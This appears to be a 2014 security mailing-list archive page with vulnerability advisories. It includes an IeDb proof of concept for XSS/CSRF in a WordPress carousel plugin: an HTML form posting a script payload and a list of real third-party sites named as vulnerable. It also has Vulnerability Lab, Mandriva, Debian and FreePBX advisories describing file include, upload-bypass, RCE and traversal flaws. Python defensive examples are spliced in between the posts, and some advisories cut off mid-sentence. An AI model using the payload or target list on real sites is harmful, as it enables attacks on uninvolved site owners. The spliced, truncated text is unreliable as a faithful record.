Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln

2014-02-13 Thread iedb . team




#  Exploit :


<center><b>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability</b></center><br><br>
<html>
<head>
<title>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability   [IeDb TeaM]</title>
</head><body>
<form action="http://YourTarget.Com" id="formid" method="post">
<input name="name" value="'"<script>alert(/IeDb.ir/)</script>"' /><br><br>
<input type="submit" value="Submit"/>
</form></body></html>

#
#  XSS Code : "<script>alert(/IeDb.ir/)</script>"
#
#  Vulnerable Page :
#
#   
Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
#
#
#   [+] Image : http://sectime.ir/myfiles/Xss-wp.png
#
#
#
# D3m0 :
#
#

http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php
http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php

#
#
# Gr33tz : All Members In IeDb.Ir/acc  |  Thanks : 8ThBit , Dr.3v1l And 


###

# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04]

###
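The PoC form above works for two reasons: the target page accepts a POST from any origin, and it echoes the `name` field back into the page unescaped. The following is an added example, not code from the IeDb post or from the all_in_one_carousel plugin; it shows a handler that refuses a request whose anti-CSRF token does not match the one issued with the form and that HTML-escapes the stored value when rendering it. The in-memory session, the `_csrf` field name and the function names are this example's own assumptions. In WordPress the equivalent primitives are nonces (`wp_nonce_field` / `check_admin_referer`) and `esc_attr` / `esc_html` at output time.

```python
"""Rejecting cross-site POSTs and escaping the stored value on output (added example)."""
import html
import hmac
import secrets

TOKEN_FIELD = "_csrf"   # assumed hidden field carried only by the legitimate form


def issue_token(session: dict) -> str:
    """Create (or reuse) the per-session token that the real form embeds."""
    if "csrf" not in session:
        session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def csrf_ok(session: dict, form: dict) -> bool:
    """True only if the form carries the token bound to this session."""
    expected = session.get("csrf")
    supplied = form.get(TOKEN_FIELD, "")
    if not expected:
        return False
    # compare_digest on bytes: constant-time and safe for non-ASCII input
    return hmac.compare_digest(expected.encode(), supplied.encode())


def handle_add_carousel(session: dict, form: dict, store: list):
    """Return (http_status, body). A cross-site submission gets 403 and stores nothing."""
    if not csrf_ok(session, form):
        return 403, "request rejected: missing or invalid anti-CSRF token"
    name = form.get("name", "").strip()[:100]
    store.append(name)
    # Escape at output time so a stored script string renders as literal text.
    return 200, f'<input name="name" value="{html.escape(name, quote=True)}">'
```

A forged page cannot read the victim's token (same-origin policy), so the check fails for the PoC's cross-site POST; escaping on output covers the case where a value was stored before the check existed.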


WiFi Camera Roll v1.2 iOS - Multiple Web Vulnerabilities

2014-02-13 Thread Vulnerability Lab
Document Title:
===
WiFi Camera Roll v1.2 iOS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1192


Release Date:
=
2014-02-08


Vulnerability Laboratory ID (VL-ID):

1192


Common Vulnerability Scoring System:

7.9


Product & Service Introduction:
===
Download or upload photos/videos via WiFi! It is an easy way to wirelessly 
access your photos/videos in the camera roll on your devices. 
It only needs a web browser and does not depend on any other transfer utilities. 
Just start the app and input the address into the 
address bar of your browser, and you can browse the photos/videos in the camera roll 
on your device. What's more, you can upload 
photos/videos and it will save them into the camera roll automatically.

- You can browse the photos in the camera roll on the device
- Download photos in full-size with EXIF metadata
- Upload images in the specified formats into the camera roll
- Optional password protection for the web interface
- One app compatible with both iPhone and iPad
- Supports major browsers, e.g. Safari, Chrome, IE, etc.
- A web browser is enough; it does not depend on Flash, Java, etc.
- [NEW] Download unmodified HD quality video
- [NEW] Upload specified format videos directly into your camera roll
- [NEW] View photo gallery in web browser

I'm always keeping this app concise and easy to use. It is just a bridge to 
connect your iPhone/iPad and computer. All photos and 
videos are saved in your system album and on your computer, so they are safe and 
won't be lost even if you accidentally delete this app.

(Copy of the Homepage: 
https://itunes.apple.com/ch/app/wifi-camera-roll/id576954110 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in the official WiFi Camera Roll v1.2 iOS mobile 
web-application.


Vulnerability Disclosure Timeline:
==
2014-02-08:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Apple AppStore
Product: WiFi Camera Roll (iOS) - Application 1.2


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

1.1
A local file/path include web vulnerability has been discovered in the official 
WiFi Camera Roll v1.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to include 
unauthorized local file/path requests or system 
specific path commands to compromise the web-application or mobile device.

The local file include web vulnerability is located in the vulnerable `qqfile` 
name value of the `upload files` module (web-interface).
Remote attackers are able to inject own files with malicious filenames to 
compromise the mobile application. The attack vector is 
persistent and the request method is POST. The local file/path include execution 
occurs in the main file index section after the refresh 
of the file upload. The security risk of the local file include web 
vulnerability is estimated as high(+) with a cvss (common vulnerability 
scoring system) count of 7.8(+)|(-)7.9.

Exploitation of the local file include web vulnerability requires no user 
interaction or privileged web-application user account with password. 
Successful exploitation of the local web vulnerability results in mobile 
application or connected device component compromise by unauthorized 
local file include web attacks.

Request Method(s):
[+] [POST]

Vulnerable Input(s):
[+] Upload Files

Vulnerable Parameter(s):
[+] filename & qqfile

Affected Module(s):
[+] Access from Computer (File Dir Index List - 
Folder/Category to  path=/)


1.2
An arbitrary file upload web vulnerability has been discovered in the official 
WiFi Camera Roll v1.2 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with 
multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the `upload file` (video and images) module. 
Remote attackers are able to upload php or js web-shells by renaming 
the file with multiple extensions to bypass the file restriction mechanism. The 
attacker uploads for example a web-shell with the following name 
and extension `image.gif.jpg.html.js.aspx.jpg`. After the upload the attacker 
needs to open the file in the web application. He deletes the .jpg & 
.gif file extension and can access the application with elevated access rights. 
The security risk of the arbitrary file upload web vulnerability is 
estimated as high with a cvss (common vulnerability scoring 
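Both findings in this advisory come down to trusting the client's filename: 1.1 lets the `qqfile` value carry path components, and 1.2 lets stacked extensions such as `image.gif.jpg.html.js.aspx.jpg` hide an executable type behind an image suffix. The code below is an added example, not code from WiFi Camera Roll or from Vulnerability Lab; it keeps only a bare name, requires exactly one extension from an allowlist, and writes the file under a server-generated name so that a later rename has nothing to act on. The allowlist, the upload root and the function names are this example's own assumptions.

```python
"""Validating user-supplied upload filenames before anything is written (added example)."""
import os
import re
import secrets

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "mp4", "mov"}  # assumed policy
NAME_RE = re.compile(r"[A-Za-z0-9._-]{1,128}")


class InvalidUpload(ValueError):
    pass


def validate_upload_name(raw_name: str) -> str:
    """Return the single allowed extension of raw_name, or raise InvalidUpload."""
    name = raw_name.replace("\\", "/")
    # 1. A filename is a bare name: no separators, no NUL, no dot-only names.
    if "/" in name or "\x00" in name or name in ("", ".", ".."):
        raise InvalidUpload(f"path component or empty name: {raw_name!r}")
    if not NAME_RE.fullmatch(name):
        raise InvalidUpload(f"disallowed characters: {raw_name!r}")
    stem, *chain = name.lower().split(".")
    # 2. Exactly one extension, so 'photo.gif.jpg' and 'x.php.jpg' are refused
    #    outright instead of being judged by whichever suffix a server looks at.
    if not stem or len(chain) != 1:
        raise InvalidUpload(f"expected <stem>.<ext>, got {raw_name!r}")
    if chain[0] not in ALLOWED_EXTENSIONS:
        raise InvalidUpload(f"extension {chain[0]!r} not allowed")
    return chain[0]


def storage_path(raw_name: str, upload_root: str) -> str:
    """Path the upload would be written to: random stem plus the validated extension."""
    ext = validate_upload_name(raw_name)
    path = os.path.join(upload_root, f"{secrets.token_hex(16)}.{ext}")
    # 3. Defence in depth: the resolved path must still sit under the upload root.
    root = os.path.realpath(upload_root)
    if os.path.commonpath([root, os.path.realpath(path)]) != root:
        raise InvalidUpload("resolved path escaped the upload root")
    return path


def is_rejected(raw_name: str) -> bool:
    """Convenience predicate for checks: does validation refuse this name?"""
    try:
        validate_upload_name(raw_name)
    except InvalidUpload:
        return True
    return False
```

Serving the upload directory with script execution disabled is the matching server-side control; the name check above only ensures nothing that looks executable is ever accepted in the first place.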

[ MDVSA-2014:025 ] pidgin

2014-02-13 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:025
 http://www.mandriva.com/en/support/security/
 ___

 Package : pidgin
 Date: February 11, 2014
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been discovered and corrected in pidgin:
 
 The Yahoo! protocol plugin in libpurple in Pidgin before 2.10.8 does
 not properly validate UTF-8 data, which allows remote attackers
 to cause a denial of service (application crash) via crafted byte
 sequences (CVE-2012-6152).
 
 Multiple integer signedness errors in libpurple in Pidgin before 2.10.8
 allow remote attackers to cause a denial of service (application crash)
 via a crafted timestamp value in an XMPP message (CVE-2013-6477).
 
 gtkimhtml.c in Pidgin before 2.10.8 does not properly interact
 with underlying library support for wide Pango layouts, which
 allows user-assisted remote attackers to cause a denial of service
 (application crash) via a long URL that is examined with a tooltip
 (CVE-2013-6478).
 
 util.c in libpurple in Pidgin before 2.10.8 does not properly allocate
 memory for HTTP responses that are inconsistent with the Content-Length
 header, which allows remote HTTP servers to cause a denial of service
 (application crash) via a crafted response (CVE-2013-6479).
 
 libpurple/protocols/yahoo/libymsg.c in Pidgin before 2.10.8 allows
 remote attackers to cause a denial of service (crash) via a Yahoo! P2P
 message with a crafted length field, which triggers a buffer over-read
 (CVE-2013-6481).
 
 Pidgin before 2.10.8 allows remote MSN servers to cause a denial
 of service (NULL pointer dereference and crash) via a crafted (1)
 SOAP response, (2) OIM XML response, or (3) Content-Length header
 (CVE-2013-6482).
 
 The XMPP protocol plugin in libpurple in Pidgin before 2.10.8 does
 not properly determine whether the from address in an iq reply
 is consistent with the to address in an iq request, which allows
 remote attackers to spoof iq traffic or cause a denial of service
 (NULL pointer dereference and application crash) via a crafted reply
 (CVE-2013-6483).
 
 The STUN protocol implementation in libpurple in Pidgin before 2.10.8
 allows remote STUN servers to cause a denial of service (out-of-bounds
 write operation and application crash) by triggering a socket read
 error (CVE-2013-6484).
 
 Buffer overflow in util.c in libpurple in Pidgin before 2.10.8 allows
 remote HTTP servers to cause a denial of service (application crash)
 or possibly have unspecified other impact via an invalid chunk-size
 field in chunked transfer-coding data (CVE-2013-6485).
 
 gtkutils.c in Pidgin before 2.10.8 on Windows allows user-assisted
 remote attackers to execute arbitrary programs via a message containing
 a file: URL that is improperly handled during construction of an
 explorer.exe command. NOTE: this vulnerability exists because of an
 incomplete fix for CVE-2011-3185 (CVE-2013-6486).
 
 Integer overflow in libpurple/protocols/gg/lib/http.c in the Gadu-Gadu
 (gg) parser in Pidgin before 2.10.8 allows remote attackers to have
 an unspecified impact via a large Content-Length value, which triggers
 a buffer overflow (CVE-2013-6487).
 
 Integer signedness error in the MXit functionality in Pidgin
 before 2.10.8 allows remote attackers to cause a denial of service
 (segmentation fault) via a crafted emoticon value, which triggers an
 integer overflow and a buffer overflow (CVE-2013-6489).
 
 The SIMPLE protocol functionality in Pidgin before 2.10.8 allows remote
 attackers to have an unspecified impact via a negative Content-Length
 header, which triggers a buffer overflow (CVE-2013-6490).
 
 The IRC protocol plugin in libpurple in Pidgin before 2.10.8 does
 not validate argument counts, which allows remote IRC servers to
 cause a denial of service (application crash) via a crafted message
 (CVE-2014-0020).
 
 This update provides pidgin 2.10.9, which is not vulnerable to
 these issues.
 
 Additionally, a build problem concerning sqlite3 was discovered and
 fixed; therefore fixed sqlite3 packages are also provided with this
 advisory.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6152
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6477
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6478
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6479
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6481
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6482
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6483
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6484
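Several of the issues in this advisory share one root cause: a length field sent by the peer was trusted before memory was sized for it, whether a body inconsistent with Content-Length (CVE-2013-6479), a negative Content-Length (CVE-2013-6490), a large Content-Length driving an integer overflow (CVE-2013-6487), or an invalid chunk-size in chunked transfer-coding (CVE-2013-6485). The following is an added example, not libpurple's code: a parser that accepts only canonical ASCII digits, bounds every declared length against a fixed maximum, and checks the bytes actually received against the declaration, so a hostile header is refused before anything is allocated for it. The 16 MiB limit and the sample responses are this example's own.

```python
"""Strict parsing of Content-Length and chunk-size before any allocation (added example)."""
MAX_BODY = 16 * 1024 * 1024   # assumed policy: refuse bodies larger than 16 MiB
HEXDIGITS = frozenset(b"0123456789abcdefABCDEF")


class BadResponse(ValueError):
    pass


def parse_content_length(value: str) -> int:
    v = value.strip()
    # isdigit() alone accepts Unicode digits; isascii() narrows it to 0-9, and the
    # sign characters of '-5' / '+5' are rejected along with '12abc' and '1 2'.
    if not v or not v.isascii() or not v.isdigit():
        raise BadResponse(f"invalid Content-Length: {value!r}")
    n = int(v)
    if n > MAX_BODY:
        raise BadResponse(f"Content-Length {n} exceeds {MAX_BODY}")
    return n


def body_for_content_length(declared: str, received: bytes) -> bytes:
    """Return exactly the declared bytes; refuse a short body instead of reading past it."""
    n = parse_content_length(declared)
    if len(received) < n:
        raise BadResponse(f"body has {len(received)} bytes, header declares {n}")
    return received[:n]


def parse_chunk_size(line: bytes) -> int:
    head = line.split(b";", 1)[0].strip()   # chunk-ext after ';' is ignored
    # At most 8 hex digits caps the value below 2**32 before int() ever sees it.
    if not head or len(head) > 8 or any(c not in HEXDIGITS for c in head):
        raise BadResponse(f"invalid chunk-size: {line!r}")
    n = int(head, 16)
    if n > MAX_BODY:
        raise BadResponse(f"chunk-size {n} exceeds {MAX_BODY}")
    return n


def dechunk(data: bytes) -> bytes:
    """Decode a chunked body, bounding the running total and checking every CRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            raise BadResponse("truncated chunk-size line")
        size = parse_chunk_size(data[pos:eol])
        pos = eol + 2
        if size == 0:
            return bytes(out)              # trailers, if any, are ignored here
        if len(out) + size > MAX_BODY:
            raise BadResponse("chunked body exceeds limit")
        chunk = data[pos:pos + size]
        if len(chunk) != size or data[pos + size:pos + size + 2] != b"\r\n":
            raise BadResponse("truncated chunk or missing CRLF after chunk-data")
        out += chunk
        pos += size + 2


def is_rejected(fn, *args) -> bool:
    """Does the parser refuse this input with BadResponse?"""
    try:
        fn(*args)
    except BadResponse:
        return True
    return False
```

The same shape carries over to C: parse into an unsigned type, reject non-digit input and more than a fixed number of digits before converting, compare against a hard ceiling, and only then size the buffer.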
 

[SECURITY] [DSA 2860-1] parcimonie security update

2014-02-13 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2860-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
February 11, 2014  http://www.debian.org/security/faq
- -

Package: parcimonie
Vulnerability  : information disclosure
CVE ID : CVE-2014-1921
Debian Bug : 738134

Holger Levsen discovered that parcimonie, a privacy-friendly helper to
refresh a GnuPG keyring, is affected by a design problem that undermines
the usefulness of this piece of software in the intended threat model.

When using parcimonie with a large keyring (1000 public keys or more),
it would always sleep exactly ten minutes between two key fetches. This
can probably be used by an adversary who can watch enough key fetches to
correlate multiple key fetches with each other, which is what parcimonie
aims at protecting against. Smaller keyrings are affected to a smaller
degree. This problem is slightly mitigated when using a HKP(s) pool as
the configured GnuPG keyserver.

For the stable distribution (wheezy), this problem has been fixed in
version 0.7.1-1+deb7u1.

For the unstable distribution (sid), this problem has been fixed in
version 0.8.1-1.

We recommend that you upgrade your parcimonie packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJS+o1qAAoJEAVMuPMTQ89ETXcQAJEdl0FJxcIn9/da5PrFYSav
b4dJ4OfCWWGdhiLh/REuSeDFUvjQJrgWF/2LaEi6Hz22r9W8K3mZc8ZMnJgvcudn
uqS1Z6LUI3Y4xwfh+mdpG5FbdXX4xxzB5EJ1I7+4hXo2YiqtUNAbsZJqzh5gkF2/
cd+RMoOHG7yGMx9jmc3c766hN8c9+wK2Nad2Y7WyRC6l4AWSg5pqWfjMcYh0GXc9
ANQPzS3b+ajJd2RNtTNM05rShq0ic1BJ4RZJjfWthzCWj/3tkYjiLxPrUpuUYqa9
5n6Xq8Jt+EWhCv7P7R0R+VVhX11Ywt5JyjJwTbF6DWrjqwLIc+4jHb3Ww44FZMgK
+ODCq6zU3PsIC/HCqfk6YhCa/2MeO++mtCYBVdu6Px2IE5cFe8/ubH2j2rxusyX7
m0ZWopXvLIJgXzTyDwH5M1c0N2wUkLlhywi33z8ySk0yqZnM0rtiAIvGsBsBkoNx
DjOJfRSJAmmIGf+7iP+QcsK/ULgt8rvNR2s2OZOmvRoe+Qsp56wYpazDYkSize1f
a/PNMA5i9tEWXAm2dL/j/Lg8hL+txxPnluYAyzm2galn/hne/oUlivOW9T/RP4e8
8QOoTyurEukp1/z1SHRMj0bkG2W1ICOnoij8J4NPzdtJ+trMj1ZlMZAbT53X3HEO
iqolODfCHkE/z33xBdeX
=aX8i
-END PGP SIGNATURE-
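The advisory's point is a timing side channel: once the keyring is large, the schedule settles on one constant delay (ten minutes in the report), and an observer who sees a few fetches can pair them up by that regular spacing. The code below is an added example; it is not parcimonie's code and does not reproduce its scheduler. It contrasts the flawed constant gap with a delay drawn uniformly from a window around the average needed to refresh every key within a target period, using the system CSPRNG, and includes a small detector of the kind a defender would run over observed fetch timings. The weekly period, the 60 s floor and the function names are this example's own assumptions.

```python
"""Randomising the gap between keyserver fetches so they cannot be linked by timing (added example)."""
import random
import secrets
import statistics

TARGET_PERIOD_S = 7 * 86400   # assumed goal: every key refreshed about once a week
MIN_DELAY_S = 60              # assumed floor so the keyserver is never hammered


def fixed_delay(keyring_size: int, target_period_s: int = TARGET_PERIOD_S) -> int:
    """Flawed scheme: the average gap, identical for every fetch."""
    return max(MIN_DELAY_S, target_period_s // max(keyring_size, 1))


def randomized_delay(keyring_size: int, target_period_s: int = TARGET_PERIOD_S,
                     rng=secrets.randbelow) -> int:
    """Uniform draw from [avg/2, avg/2 + avg]: the mean stays near avg, the spacing does not repeat."""
    avg = max(1, target_period_s // max(keyring_size, 1))
    low = max(MIN_DELAY_S, avg // 2)
    return low + rng(avg + 1)          # rng(n) returns an int in [0, n)


def seeded_rng(seed: int):
    """Deterministic stand-in for secrets.randbelow, for reproducible checks only."""
    return random.Random(seed).randrange


def looks_periodic(intervals, max_cv: float = 0.05) -> bool:
    """Defender's check over observed gaps: near-zero spread means a fixed schedule."""
    if len(intervals) < 3:
        return False
    mean = statistics.mean(intervals)
    return mean > 0 and statistics.pstdev(intervals) / mean < max_cv
```

With 1000 keys and a one-week period the flawed scheme returns 604 s every time, close to the ten minutes the advisory describes; the randomised version spreads the same average over a window of about ten minutes, and `looks_periodic` no longer fires.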



[CVE-2014-1903] FreePBX 2.9 through 12 RCE

2014-02-13 Thread rob . thomas
Overview:
Unauthenticated user-level Remote Code Execution (RCE) vulnerability in 
admin/config.php, the main interface to FreePBX.  This bug was introduced in 
FreePBX 2.9, earlier versions are not affected.

Score - 8.4 
(AV:N/AC:L/Au:N/C:P/I:P/A:C/E:H/RL:OF/RC:C/CDP:MH/TD:ND/CR:L/IR:L/AR:M)

Reference to Advisory:
http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice

Reference to Bug:
http://issues.freepbx.org/browse/FREEPBX-7123

Fixed in Versions:
2.9 -- 2.9.0.14
2.10 - 2.10.1.15
2.11 - 2.11.0.23
12 - 12.0.1alpha22

Additional Information:
FreePBX contains an automatic alert service for upgrade notifications. If your 
system is set up correctly, you would have received an email alert of this 
vulnerability when it was detected and fixed.  Schmoozecom strongly urges you 
to ensure that the email alert address is correct and up to date to ensure you 
receive notifications of security issues and pending updates.

Schmoozecom and FreePBX are very proactive and responsive to security issues, 
and care deeply about the security of our software and systems. We welcome 
security related bug reports and issues, and they can be submitted via email to 
secur...@freepbx.org for instant attention.


[SECURITY] [DSA 2850-2] libyaml regression update

2014-02-13 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2850-2   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
February 12, 2014  http://www.debian.org/security/faq
- -

Package: libyaml
Vulnerability  : regression
Debian Bug : 738587

The security update released in DSA-2850-1 for libyaml introduced a
regression in libyaml failing to parse a subset of valid yaml documents.
For reference the original advisory text follows.

Florian Weimer of the Red Hat Product Security Team discovered a
heap-based buffer overflow flaw in LibYAML, a fast YAML 1.1 parser and
emitter library. A remote attacker could provide a YAML document with a
specially-crafted tag that, when parsed by an application using libyaml,
would cause the application to crash or, potentially, execute arbitrary
code with the privileges of the user running the application.

For the oldstable distribution (squeeze), this problem has been fixed in
version 0.1.3-1+deb6u3.

For the stable distribution (wheezy), this problem has been fixed in
version 0.1.4-2+deb7u3.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your libyaml packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
-END PGP SIGNATURE-



jDisk (stickto) v2.0.3 iOS - Multiple Web Vulnerabilities

2014-02-13 Thread Vulnerability Lab
Document Title:
===
jDisk (stickto) v2.0.3 iOS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1196


Release Date:
=
2014-02-12


Vulnerability Laboratory ID (VL-ID):

1196


Common Vulnerability Scoring System:

9.4


Product & Service Introduction:
===
jDisk turns your iPhone/iPad/iPod into a flash drive / disk. jDisk provides a 
purely web-based management UI; all you 
need to do is visit it in your browser, no client installation is needed. What's 
more, jDisk embeds a native file manager, so 
you can organize your files/folders on your device directly, open files, edit 
them, preview them, etc. All in all, jDisk 
empowers your iPhone/iPad, making it work as a moving disk / flash drive.

(Copy of the Homepage: 
https://itunes.apple.com/de/app/jdisk-convert-your-device/id604793088 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the official sticktos jDisk v2.0.3 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==
2014-02-12:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Apple AppStore
Product: jDisk (stickto) iOS - Mobile Web Application 2.0.3


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

1.1
Multiple remote code execution web vulnerabilities have been discovered in the 
official sticktos jDisk v2.0.3 iOS mobile web-application.
The vulnerability allows remote attackers to execute unauthorized system 
specific codes or commands to compromise the affected system/service.

The vulnerabilities are located in the `New+ Text file` and `New+ Folder` 
function of the jdisk wifi application file manager web-interface. 
Remote attackers are able to inject own system specific codes by manipulation 
of the folder- & file name value in the add procedure. 
The code execution occurs in the main file dir index and sub category listing, 
the add new edit file but also in the app status 
notification message context. The security risk of the remote code execution 
vulnerabilities in the add new folder- & text file function 
is estimated as critical with a cvss (common vulnerability scoring system) 
count of 9.4(+)|(-)9.5.

Exploitation of the code execution vulnerability requires no user interaction 
or privileged mobile web-application user account with password. 
Successful exploitation of the remote code execution vulnerabilities results in 
mobile application or connected device component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] New/Add Folder
[+] New/Add Text File

Vulnerable Parameter(s):
[+] folder name
[+] text-file name

Affected Module(s):
[+] Index & Sub Category - File Dir Listing
[+] Notification Message
[+] File Edit - Header


1.2
A directory-traversal web vulnerability has been discovered in the official 
sticktos jDisk v2.0.3 iOS mobile web-application.
The vulnerability allows remote attackers to gain unauthorized access to system path 
variables or web-server data to compromise the application.

The local vulnerability is located in the `folderContent to folder` value of 
the mobile application. Remote attackers can exploit the bug 
by using a manipulated GET request to access app/device 
paths or folders without authorization. The local issue is a classic directory-traversal 
web vulnerability. The execution of the malicious dt string in the 
foldercontent to folder path request occurs in the context of the requested 
interface page itself. The security risk of the directory traversal web 
vulnerability is estimated as high(-) with a cvss (common vulnerability 
scoring system) count of 6.6(+)|(-)6.7.

Exploitation of the directory traversal web vulnerability requires no user 
interaction or privileged mobile web-application user account with password. 
Successful exploitation of the path traversal web vulnerability results in 
mobile application or connected device component compromise.

Request Method(s):
[+] [GET]

Vulnerable Module(s):
[+] __FD__?action

Vulnerable Parameter(s):
[+] folderContent&folder=

Affected Module(s):
[+] Index & Sub Category - File Dir Listing



1.3
A local file include web vulnerability has been discovered in the official 
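The two jDisk findings that survive on this page are the `folder` value of the `folderContent` GET request walking out of the share (1.2) and folder or text-file names created through POST being echoed unescaped into the directory index, the edit header and the status message (1.1). The code below is an added example, not jDisk's code; it confines the folder parameter to the share root, restricts new names to a single printable path element, and escapes every name in both text and attribute context when the listing is rendered. The share root, the request shape and the function names are this example's own assumptions.

```python
"""Confining a client-supplied folder parameter and escaping names in a listing (added example)."""
import html
import os
import posixpath
from urllib.parse import quote, unquote


class Forbidden(Exception):
    pass


def resolve_folder(share_root: str, requested: str) -> str:
    """Map a `folder=` value onto a directory under share_root, or raise Forbidden."""
    value = unquote(requested).replace("\\", "/")   # decode once; treat backslash as a separator too
    if "\x00" in value or value.startswith("/"):
        raise Forbidden(f"absolute path or NUL in folder: {requested!r}")
    norm = posixpath.normpath(value) if value else "."
    # Anything that still points upward after normalisation is an escape attempt.
    if norm == ".." or norm.startswith("../"):
        raise Forbidden(f"folder escapes share: {requested!r}")
    root = os.path.realpath(share_root)
    candidate = os.path.realpath(os.path.join(root, norm))
    # Defence in depth against symlinks inside the share that point outward.
    if os.path.commonpath([root, candidate]) != root:
        raise Forbidden(f"folder resolves outside share: {requested!r}")
    return candidate


def is_forbidden(share_root: str, requested: str) -> bool:
    try:
        resolve_folder(share_root, requested)
    except Forbidden:
        return True
    return False


def validate_new_name(name: str) -> str:
    """Name for a new folder or text file: one path element, printable, bounded length."""
    if not name or len(name) > 255 or name in (".", ".."):
        raise ValueError("empty, dot-only or over-long name")
    if "/" in name or "\\" in name or any(ord(c) < 32 or c == "\x7f" for c in name):
        raise ValueError("separator or control character in name")
    return name


def is_valid_name(name: str) -> bool:
    try:
        validate_new_name(name)
    except ValueError:
        return False
    return True


def render_listing(entries) -> str:
    """Directory index fragment: names are URL-encoded in the href and HTML-escaped everywhere."""
    rows = []
    for e in entries:
        text = html.escape(e["name"], quote=True)
        href = html.escape(quote(e["name"]), quote=True)
        kind = "dir" if e["is_dir"] else "file"
        rows.append(f'<li class="{kind}"><a href="?folder={href}">{text}</a></li>')
    return "<ul>" + "".join(rows) + "</ul>"
```

Note that `validate_new_name` deliberately allows characters such as `<` in a name: the listing stays safe because escaping happens at output, not because the input is trusted to be clean.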

[ MDVSA-2014:026 ] openldap

2014-02-13 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:026
 http://www.mandriva.com/en/support/security/
 ___

 Package : openldap
 Date: February 12, 2014
 Affected: Business Server 1.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in openldap:
 
 The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier does not
 properly count references, which allows remote attackers to cause
 a denial of service (slapd crash) by unbinding immediately after a
 search request, which triggers rwm_conn_destroy to free the session
 context while it is being used by rwm_op_search (CVE-2013-4449).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4449
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 f6f47a0a0de36f77454b42b7d67cad11  
mes5/i586/libldap2.4_2-2.4.11-3.6mdvmes5.2.i586.rpm
 6ef1ee5fae026d70c3a940b597c2899c  
mes5/i586/libldap2.4_2-devel-2.4.11-3.6mdvmes5.2.i586.rpm
 cff64c1d004f5dcadf58893f54bd2b79  
mes5/i586/libldap2.4_2-static-devel-2.4.11-3.6mdvmes5.2.i586.rpm
 4bc668febb73c0ce41d928f6bc66aead  
mes5/i586/openldap-2.4.11-3.6mdvmes5.2.i586.rpm
 3c22bef679a50ecaf3ea705089b3b787  
mes5/i586/openldap-clients-2.4.11-3.6mdvmes5.2.i586.rpm
 5bda4d05eb3c630b915aebde7c80410c  
mes5/i586/openldap-doc-2.4.11-3.6mdvmes5.2.i586.rpm
 95e6338873c0b3643cf0983bcd82a933  
mes5/i586/openldap-servers-2.4.11-3.6mdvmes5.2.i586.rpm
 dea70a29075de07ca438417e5b775856  
mes5/i586/openldap-testprogs-2.4.11-3.6mdvmes5.2.i586.rpm
 0ad5f08372fb554fff145b9f202f8845  
mes5/i586/openldap-tests-2.4.11-3.6mdvmes5.2.i586.rpm 
 8358868a61a01b5204d032d9674e5728  
